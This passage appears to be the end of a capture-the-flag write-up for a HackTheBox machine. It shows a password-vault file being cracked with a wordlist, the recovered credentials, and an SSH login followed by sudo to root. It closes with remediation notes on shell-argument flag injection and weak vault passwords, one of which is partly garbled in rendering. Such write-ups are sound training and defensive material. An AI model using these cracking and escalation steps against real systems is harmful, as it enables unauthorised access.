<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ python3 pswm-decrypt.py -f pswm -w /usr/share/wordlists/rockyou.txt</span><br><span class="line">[+] Master Password: flower</span><br><span class="line">[+] Decrypted Data:</span><br><span class="line">+------------+----------+----------------------+</span><br><span class="line">| Alias      | Username | Password             |</span><br><span class="line">+------------+----------+----------------------+</span><br><span class="line">| pswm       | aleks    | flower               |</span><br><span class="line">| aleks@down | aleks    | 1uY3w22uc-Wr&#123;xNHR~+E |</span><br><span class="line">+------------+----------+----------------------+</span><br></pre></td></tr></table></figure>

<p><code>flower</code> is near the top of rockyou, so it lands almost immediately. The vault hands us aleks’ login password.</p>
<blockquote>
<p>scrypt with <code>N=2**14</code> is deliberately memory-hard (~16 MB&#x2F;attempt), so a serial loop is fine here only because the master password is a top-rockyou hit. Against a stronger password you’d want to parallelise across cores and skip the <code>cryptocode</code> import overhead by calling PyCryptodome directly.</p>
</blockquote>
<hr>
<h3 id="Root"><a href="#Root" class="headerlink" title="Root"></a>Root</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">ssh aleks@<span class="variable">$TARGET</span>        <span class="comment"># password: 1uY3w22uc-Wr&#123;xNHR~+E</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">sudo</span> -l</span><br><span class="line"><span class="comment"># (ALL : ALL) ALL</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">sudo</span> -i</span><br><span class="line"><span class="comment"># root@down:~#</span></span><br></pre></td></tr></table></figure>

<img width="1026" height="450" alt="image" src="https://github.com/user-attachments/assets/b924e69c-30b4-46bb-ac10-e52dd4f07d00" />

<p>Full sudo, no restrictions. Grab <code>root.txt</code>.</p>
<hr>
<h3 id="Why-it-worked-three-fixes"><a href="#Why-it-worked-three-fixes" class="headerlink" title="Why it worked (three fixes)"></a>Why it worked (three fixes)</h3><ul>
<li><strong><code>escapeshellcmd()</code> ≠ <code>escapeshellarg()</code>.</strong> The first blocks shell metacharacters but leaves <code>-</code> alone, so any binary behind it is open to flag injection. User input that becomes a single argument needs <code>escapeshellarg()</code>, plus <code>--</code> to end option parsing.</li>
<li><strong>Validate the value you actually use.</strong> The <code>intval(port)‘→validate→use−‘port)</code> → validate → use-<code> port)‘→validate→use−‘port</code> gap <em>is</em> the nc injection. Re-assign the sanitized int (<code>port=(int)port = (int) port=(int)port;</code>) before it touches the command.</li>
<li><strong>A leaked GCM vault is an offline password oracle.</strong> The authenticity tag doubles as the “is this the right key” check, so the only thing between a stolen vault and its contents is the KDF cost — defeated here by a weak master password.</li>
</ul>

  </div>

  
  <div class="post-card-tags post-tags">
    
      <a class="tag" href="/tags/htb/">#htb</a>
    
      <a class="tag" href="/tags/privesc/">#privesc</a>
    
  </div>
  

  
  <div class="post-cta">
    <p class="post-cta-text">Found this useful?</p>
    <div class="post-cta-buttons">
      
      <a class="btn-follow" href="https://github.com/r3vpwnx" target="_blank" rel="noopener noreferrer">
        <svg viewBox="0 0 24 24" width="16" height="16" aria-hidden="true">
          <circle cx="12" cy="13" r="8" fill="none" stroke="currentColor" stroke-width="1.8"/>
          <path d="M7 8 L9.5 5.5" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round"/>
          <path d="M17 8 L14.5 5.5" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round"/>
          <circle cx="9" cy="12.5" r="1.1" fill="currentColor"/>
          <circle cx="15" cy="12.5" r="1.1" fill="currentColor"/>
        </svg>
        Follow on GitHub
      </a>
      
      
      <a class="btn-support" href="https://paypal.me/theoptech" target="_blank" rel="noopener noreferrer">
        <svg viewBox="0 0 24 24" width="16" height="16" aria-hidden="true">
          <path d="M6 4h8a4.5 4.5 0 0 1 4.4 5.5A5.5 5.5 0 0 1 13 14h-3l-1 6H6L8.2 4Z" fill="none" stroke="currentColor" stroke-width="1.6" stroke-linejoin="round"/>
        </svg>
        Support via PayPal
      </a>
      
    </div>
  </div>
  

  <nav class="post-pager">
    <a class="pager-link" href="/2026/08/08/linux-privesc-cheatsheet/">&larr; Linux Privilege Escalation Cheatsheet</a>
    <a class="pager-link" href="/2023/03/14/welcome/">Welcome to the blog &rarr;</a>
  </nav>
</article>

    </main>
  </div>

  <footer class="site-footer">
  <p>© r3vpwnx — stay dangerous. · 2026</p>
</footer>


  <div class="search-overlay" id="searchOverlay" hidden>
    <div class="search-box">
      <div class="search-input-row">
        <svg viewBox="0 0 24 24" width="18" height="18" aria-hidden="true">
          <circle cx="10.5" cy="10.5" r="6.5" fill="none" stroke="currentColor" stroke-width="2"/>
          <line x1="20" y1="20" x2="15.2" y2="15.2" stroke="currentColor" stroke-width="2" stroke-linecap="round"/>
        </svg>
        <input type="text" id="searchInput" placeholder="Search writeups, articles, cheatsheets..." autocomplete="off">
        <button id="searchClose" class="search-close" aria-label="Close search">&times;</button>
      </div>
      <div id="searchResults" class="search-results"></div>
    </div>
  </div>

  <script>
    window.BLACKICE = {
      root: "/",
      clickEffect: {"enable":true,"words":["ACCESS GRANTED","ROOT","0-DAY","SHELL SPAWNED","EXPLOIT","PWNED","BACKDOOR PLANTED","RECON COMPLETE","PAYLOAD DELIVERED","PRIVESC","C2 ESTABLISHED","BREACH DETECTED","LATERAL MOVEMENT","PERSISTENCE SET","EXFILTRATED","NMAP -sV -sC","INJECT","SEGFAULT"]},
      searchPath: "/search.xml"
    };
  </script>
  <script src="/js/main.js"></script>
  <script src="/js/click-effect.js"></script>
  <script src="/js/search.js"></script>
  <script src="/js/code-copy.js"></script>
</body>
</html>
